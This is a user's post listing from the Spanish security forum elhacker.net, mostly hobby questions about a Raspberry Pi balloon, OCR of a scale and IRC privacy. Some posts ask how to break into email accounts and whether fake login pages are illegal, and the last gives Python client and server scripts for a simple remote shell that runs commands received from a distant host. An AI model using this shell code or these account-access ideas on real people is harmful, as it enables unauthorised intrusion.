elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Arreglado, de nuevo, el registro del warzone (wargame) de EHN


  Mostrar Temas
Páginas: [1] 2
1  Foros Generales / Dudas Generales / Módem usb para la estratosfera. en: 14 Julio 2017, 21:12 pm
Buenas, estoy haciendo el proyecto Pi in the Sky como reto propio, me gustaría disponer de conexión 3G (además de por radio) con el globo meteorológico en el que irá montada la Raspberry Pi.

Para ello he pensado en utilizar un módem usb pero no encuentro por ningún lado información sobre si estos tienen límitaciones de altitud.

Espero que alguien sepa algo aquí, muchas gracias de antemano!!
2  Informática / Electrónica / Reconocimiento de caracteres con Android en: 4 Marzo 2017, 14:56 pm
Buenas, estoy haciendo un pequeño proyecto en el que usando una báscula doméstica pueda mostrar en una pantalla el peso correspondiente de esa persona en los planetas del sistema solar. La parte de la conversión y la física es sencilla, el problema lo estoy teniendo en capturar el peso de la báscula.

Mi idea original era intervenir la señal del circuito integrado y utilizarla directamente pero después pasarme una tarde pinchando por todos lados con un osciloscopio sin resultado útil, le pregunté a mi profesor de micro robótica de la universidad y me dijo que sería más fácil utilizar una cámara, así que pensé que no sería difícil encontrar algun API de reconocimiento de caracteres para Android que pudiera transmitir por bluetooth para recoger los datos desde una RPi.
El caso es que he probado con Google Goggles pero no sólo falla muchísimo para reconocer sino que no sé cómo enviar luego esos datos a la raspberry...

Alguien tiene alguna idea?

Gracias de antemano.
3  Comunicaciones / Mensajería / ¿Cuál es el servidor IRC más seguro? en: 4 Septiembre 2016, 17:47 pm
El otro día unos amigos me dijeron que los IRC están muy espiados y que whatsapp es mejor, ya que tiene cifrado end to end.
¿Hasta que punto es esto cierto? ¿Y cuál es el servidor IRC más seguro?
4  Foros Generales / Dudas Generales / Ilegalidad en GitHub en: 3 Septiembre 2016, 16:50 pm
Buenas, he escrito un script bastante robusto para generar diccionarios de contraseñas a partir de keywords, y lo estoy publicando en GitHub desde que lo comencé. Me basé en uno que utilizó Elliot, el protagonista de Mr Robot y de hecho he llamado de esa forma a mi script.
Mi pregunta es:
¿Es ilegal publicar generadores de diccionarios en GitHub?
5  Foros Generales / Dudas Generales / Delito o no. en: 1 Septiembre 2016, 09:18 am
Hola, mi duda es la siguiente:
Si yo suplanto una página de registro/login haciendome pasar por una entidad cualquiera y la utilizo para conseguir datos de alguien es delito.
Pero ¿sería delito crear yo un registro/login cualquiera y que alguien entrara? aunque luego no hubiera ninguna página, solo el login.

Saludos.
6  Foros Generales / Foro Libre / Compañeros de grupo. en: 22 Agosto 2016, 14:44 pm
He leido un post antiguo de alguien que buscaba gente para un grupo de hacking y la verdad es que me gusta la idea, he creado un canal IRC para charlar, antes de nada tengo que decir que no busco ningún grupo serio ni nada, tan solo conversar un rato sobre el tema.

Canal: #fedcek
Yo soy: skullcr4ck
7  Foros Generales / Sugerencias y dudas sobre el Foro / Fundadores del foro en: 21 Agosto 2016, 17:25 pm
Me da curiosidad saber quién o quiénes crearon el foro y quién es actualmente el "mandamás" o el "jefe" por decirlo de alguna manera.
8  Seguridad Informática / Hacking / Conseguir acceso a cuenta correo en: 14 Agosto 2016, 19:11 pm
Buenas, me gustaría hacer un par de preguntas:
¿Qué métodos se utilizan para obtener acceso a una cuenta de correo sin la contraseña?
¿Qué métodos son esos a los que la gente se refiere como mágicos, que consiguen auditoria sin la intervención del dueño de la cuenta?

Agradezco las respuestas personales en lugar de un simple enlace a busqueda de google pero tampoco rechazo esto ultimo.
Muchas gracias.
9  Foros Generales / Dudas Generales / Cómo aprender pentesting. en: 9 Agosto 2016, 20:20 pm
Buenas, quisiera comentar mi situación. Desde siempre me ha gustado la informática y hace unos 6 años descubrí la programación y empecé a aprender sobre el tema. El caso es que me encantaría aprender a hacer pentesting web y romper la seguridad de los sistemas.
Esto supongo que también me ayudará a la hora de programar y me hará crear código más seguro.

Mi pregunta es dónde puedo encontrar información medianamente actualizada y relacionada directamente con lo que me interesa, que es romper la seguridad de sistemas.

Gracias de antemano!
10  Seguridad Informática / Análisis y Diseño de Malware / [Ayuda] Script con python en: 9 Agosto 2016, 15:53 pm
Buenas, hace poco he preguntado cómo comunicarme entre scripts con python para hacer una shell remota simple. Pues bien, he utilizado sockets y me ha funcionado, en red local. Ahora estoy intentando un amigo está intentando conectarse a mi script servidor desde su cliente pero no puede.

He abierto el puerto 4333 público y lo he asociado al 10001 privado en mi router.

Aquí adjunto los scripts. He sustituido las IPs por XX, si pudierais responder del mismo modo os lo agradeceria  :)

Código:
#!/usr/bin/python
# -*- coding: utf-8 -*-

#Script del cliente
 

import socket
import sys
import os
 
# Creo un socket TCP/IP
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

server_address = ('XX.XXX.XX.XX', 4333)
sock.connect(server_address)


datos = sock.recv(30)

comando = str(datos)
os.system(comando)

Código:
#!/usr/bin/python
# -*- coding: utf-8 -*-
 
# Script del servidor


import socket
import sys
 
# Creo el socket TCP/IP
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

direc = socket.gethostbyname(socket.gethostname())
# Enlace del socket
server_address = (direc, 10001)
connection = sock.bind(server_address)

# Escuchando conexiones entrantes
sock.listen(1)
 
coman = ''
while coman != 'salir':
    # Esperando una conexion
    print "Esperando conexion..."
    connection, client_address = sock.accept()
    coman = raw_input("Introduce comando: ")
    connection.sendall(coman)
            

connection.close()
Páginas: [1] 2
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines